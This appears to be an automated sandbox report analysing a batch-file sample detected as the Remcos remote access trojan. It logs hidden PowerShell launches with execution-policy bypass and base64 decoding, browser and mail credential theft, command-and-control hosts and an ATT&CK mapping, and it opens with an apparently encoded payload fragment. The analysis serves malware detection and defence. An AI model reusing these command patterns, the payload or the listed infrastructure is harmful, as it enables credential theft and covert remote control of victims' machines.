i5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 13_2_0041881C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_004082CD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B
                Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match; File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1356, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: Yara match, File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                MITRE ATT&CK Matrix (number before a technique name is the count of matching signatures; one row per matrix row, columns separated by "|")

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 111 Native API | 1 DLL Side-Loading | 111 Process Injection | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 22 Command and Scripting Interpreter | 1 Office Application Startup | 2 Registry Run Keys / Startup Folder | 1 Software Packing | 1 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 11 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 2 Registry Run Keys / Startup Folder | Login Hook | 1 DLL Side-Loading | NTDS | 16 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 121 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Virtualization/Sandbox Evasion | Cached Domain Credentials | 121 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1612237, Sample: 5kldoushde.bat, Startdate: 11/02/2025, Architecture: WINDOWS, Score: 100 (start node 2; each line below is one graph node followed by its edge "from->to")

                80 abokirem.duckdns.org 2->80
                82 geoplugin.net 2->82
                84 0x0.st 2->84
                92 Suricata IDS alerts for network traffic 2->92
                94 Found malware configuration 2->94
                96 Malicious sample detected (through community Yara rule) 2->96
                100 14 other signatures 2->100
                10 cmd.exe 1 2->10 started
                13 cmd.exe 1 2->13 started
                15 cmd.exe 1 2->15 started
                17 12 other processes 2->17
                98 Uses dynamic DNS services 80->98
                114 Suspicious powershell command line found 10->114
                116 Bypasses PowerShell execution policy 10->116
                19 cmd.exe 3 10->19 started
                22 conhost.exe 10->22 started
                24 cmd.exe 2 13->24 started
                26 conhost.exe 13->26 started
                28 cmd.exe 2 15->28 started
                30 conhost.exe 15->30 started
                32 cmd.exe 2 17->32 started
                34 cmd.exe 2 17->34 started
                36 22 other processes 17->36
                102 Suspicious powershell command line found 19->102
                38 powershell.exe 19 34 19->38 started
                43 conhost.exe 19->43 started
                49 2 other processes 24->49
                51 2 other processes 26->51
                45 powershell.exe 28->45 started
                47 conhost.exe 28->47 started
                53 2 other processes 32->53
                55 2 other processes 34->55
                57 20 other processes 36->57
                86 abokirem.duckdns.org 37.120.208.40, 49709, 49713, 56379 M247GB Romania 38->86
                88 0x0.st 168.119.145.117, 443, 49708, 49710 HETZNER-ASDE Germany 38->88
                90 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 38->90
                74 C:\Users\user\...\StartupScript_f1e01fdf.cmd, ASCII 38->74 dropped
                76 C:\ProgramData\remcos\logs.dat, data 38->76 dropped
                106 Detected Remcos RAT 38->106
                108 Tries to steal Mail credentials (via file registry) 38->108
                110 Maps a DLL or memory area into another process 38->110
                112 2 other signatures 38->112
                59 powershell.exe 14 38->59 started
                63 cmd.exe 38->63 started
                65 powershell.exe 38->65 started
                67 3 other processes 38->67
                78 C:\Users\user\AppData\Local\...\xdlilvqihrr, Unicode 59->78 dropped
                118 Tries to harvest and steal browser information (history, passwords, etc) 59->118
                69 cmd.exe 63->69 started
                72 conhost.exe 63->72 started
                104 Suspicious powershell command line found 69->104
